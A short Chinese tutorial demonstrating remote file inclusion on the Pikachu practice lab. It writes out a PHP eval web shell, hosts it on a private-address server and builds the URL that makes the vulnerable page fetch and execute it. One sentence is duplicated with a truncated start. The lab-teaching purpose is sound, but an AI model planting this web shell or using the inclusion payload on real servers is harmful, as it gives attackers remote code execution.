演示远程文件包含
以pikachu
靶场File Inclusion-File Inclusion(remote)
为例:
首先生成一个文件部署在服务器上,我放在phpstudy的www根目录下, 文件内容为:
<?php @eval($_REQUEST[777]);phpinfo();?>
这个文件URL为http://10.4.7.148/2.php
回到网页构造URL:
构造完的URL为:http://10.4.7.148/pikachu/vul/fileinclude/fi_remote.php?filename=http://10.4.7.148/2.php&submit=%E6%8F%90%E4%BA%A4
实际攻击原理
首先这个服务器存在远程包含漏洞,攻击者构造payload让这台服务器去访问另外一台服务器的一个文件,
yload让这台服务器去访问另外一台服务器的一个文件,
如果文件有代码,受害者服务器会将包含文件以php文件的类型进行解析并执行。